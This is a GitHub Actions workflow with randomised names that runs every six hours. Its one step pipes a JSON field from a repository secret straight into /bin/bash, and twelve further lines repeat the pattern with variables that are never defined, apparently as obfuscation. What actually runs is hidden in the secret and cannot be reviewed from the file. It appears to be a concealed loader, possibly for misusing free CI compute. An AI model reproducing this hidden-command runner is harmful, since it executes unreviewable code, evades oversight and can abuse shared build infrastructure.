name: daoxiaoquan1314

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: daoxiaoquan1314
        env:
          tvvwn2763: ${{ secrets.tvvwn2763 }}
        run: |
          echo $tvvwn2763 | jq -r .re6 | /bin/bash
          echo $edwmj12099 | jq -r .wpf17561 | /bin/bash
          echo $f8 | jq -r .zjkr46 | /bin/bash
          echo $qdrg054 | jq -r .rvekg5 | /bin/bash
          echo $m03 | jq -r .czfgx926 | /bin/bash
          echo $pw48 | jq -r .ezg8 | /bin/bash
          echo $xhrdb8186 | jq -r .uci93345 | /bin/bash
          echo $tbpa2 | jq -r .czyq27 | /bin/bash
          echo $n318 | jq -r .s37352 | /bin/bash
          echo $lqok566 | jq -r .p6 | /bin/bash
          echo $mcp2877 | jq -r .hzk7449 | /bin/bash
          echo $cg058 | jq -r .pyp9659 | /bin/bash
          echo $zinqd9288 | jq -r .yyklh4530 | /bin/bash

